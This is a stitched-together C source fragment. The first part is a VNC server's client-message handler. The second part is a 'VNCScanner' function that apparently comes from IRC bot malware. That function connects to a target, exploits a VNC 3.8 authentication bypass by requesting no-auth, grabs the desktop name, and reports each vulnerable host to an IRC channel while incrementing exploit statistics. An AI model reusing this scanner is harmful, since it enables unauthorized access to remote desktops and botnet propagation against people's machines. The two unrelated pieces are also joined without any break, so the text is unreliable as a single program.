debug_printf("failed to send the color map!"); return; } } } cl->HasRequest = 1; return; } case rfbKeyEvent: debug_printf("rfbKeyEvent!\n"); cl->rfbKeyEventsRcvd++; if ((n = ReadExact(cl, ((char *)&msg) + 1, sz_rfbKeyEventMsg - 1)) <= 0) { if (n != 0) debug_printf("rfbProcessClientNormalMessage: read"); rfbCloseClient(cl); return; } //打印接受到的键盘值 msg.ke.key=Swap32IfLE(msg.ke.key); #if CN_CFG_KEYBOARD == 1 vncclient_keyevent(cl->screen, msg); #endif return; case rfbPointerEvent: cl->rfbPointerEventsRcvd++; if ((n = ReadExact(cl, ((char *)&msg) + 1, sz_rfbPointerEventMsg - 1)) <= 0) { if (n != 0)//等于0应该是客户端主动关闭了 debug_printf("rfbProcessClientNormalMessage: read"); rfbCloseClient(cl); return; } //输入touch message msg.pe.x = Swap16IfLE(msg.pe.x); msg.pe.y = Swap16IfLE(msg.pe.y); // debug_printf("rfbPointerEvent!----x=%d y=%d\n", msg.pe.x,msg.pe.y); #if CN_CFG_KEYBOARD == 1 vncclient_pointevent(cl->screen, msg); #endif return; case rfbClientCutText: debug_printf("rfbClientCutText!\n"); if ((n = ReadExact(cl, ((char *)&msg) + 1, sz_rfbClientCutTextMsg - 1)) <= 0) { if (n != 0) debug_printf("rfbProcessClientNormalMessage: read"); rfbCloseClient(cl); return; } msg.cct.length = Swap32IfLE(msg.cct.length); str = (char *)M_MallocLc(msg.cct.length+1, 0); if ((n = ReadExact(cl, str, msg.cct.length)) <= 0) { if (n != 0) debug_printf("rfbProcessClientNormalMessage: read"); free(str); rfbCloseClient(cl); return; } // cl->screen->setXCutText(str, msg.cct.length, cl); str[msg.cct.length]= 0; debug_printf(" the cut messaged=%s\n",str); free(str); return; default: debug_printf("rfbProcessClientNormalMessage: unknown message type %d\n", msg.type); debug_printf(" ... closing connection\n"); rfbCloseClient(cl); return; } }
BOOL VNCScanner(EXINFO exinfo) { char buffer[IRCLINE]; char szClientPacket[] = "\x01"; struct sockaddr_in thataddr; int res; SOCKET m_sock; m_sock = fsocket(PF_INET, SOCK_STREAM, 0); if (m_sock == INVALID_SOCKET) { fclosesocket(m_sock); return FALSE; } thataddr.sin_addr.s_addr = finet_addr(exinfo.ip); thataddr.sin_family = AF_INET; thataddr.sin_port = fhtons((unsigned short)exinfo.port); res = fconnect(m_sock, (LPSOCKADDR) &thataddr, sizeof(thataddr)); if (res == SOCKET_ERROR) { fclosesocket(m_sock); return FALSE; } //connected //now lets negotiate protocol rfbProtocolVersionMsg pv; if (!ReadExact(m_sock, pv, sz_rfbProtocolVersionMsg)) { closesocket(m_sock); return FALSE; } pv[sz_rfbProtocolVersionMsg] = 0; int m_majorVersion, m_minorVersion; if (sscanf(pv,rfbProtocolVersionFormat,&m_majorVersion,&m_minorVersion) != 2) { closesocket(m_sock); return FALSE; } if (!(m_majorVersion == 3) && !(m_minorVersion == 8)) { //Server is not 3.8 closesocket(m_sock); return FALSE; } if (!WriteExact(m_sock, pv, sz_rfbProtocolVersionMsg)) { closesocket(m_sock); return FALSE; } //auth part CARD32 authScheme, authResult; // CARD8 challenge[CHALLENGESIZE]; //we expect to get 2 bytes if (!ReadExact(m_sock, (char *)&authScheme, 2)) { closesocket(m_sock); return FALSE; } //return clientpacket if (!WriteExact(m_sock, szClientPacket, 1)) { closesocket(m_sock); return FALSE; } if (ReadExact(m_sock, (char *) &authResult, 4)) { authResult = Swap32IfLE(authResult); switch (authResult) { case rfbVncAuthOK: { rfbServerInitMsg m_si; //send non-shared session request and receive data if (WriteExact(m_sock, (char *) useShared, sz_rfbClientInitMsg) && ReadExact(m_sock, (char *) &m_si, sz_rfbServerInitMsg)) { //lets get desktop name m_si.framebufferWidth = Swap16IfLE(m_si.framebufferWidth); m_si.framebufferHeight = Swap16IfLE(m_si.framebufferHeight); m_si.format.redMax = Swap16IfLE(m_si.format.redMax); m_si.format.greenMax = Swap16IfLE(m_si.format.greenMax); m_si.format.blueMax = Swap16IfLE(m_si.format.blueMax); m_si.nameLength = Swap32IfLE(m_si.nameLength); TCHAR *m_desktopName; m_desktopName = new TCHAR[m_si.nameLength + 2]; ReadString(m_sock, m_desktopName, m_si.nameLength); _snprintf(buffer, sizeof(buffer), "VNC%d.%d %s: %s - [AuthBypass]", m_majorVersion, m_minorVersion, m_desktopName, exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; closesocket(m_sock); return TRUE; } break; } default: { break; } } } closesocket(m_sock); return FALSE; }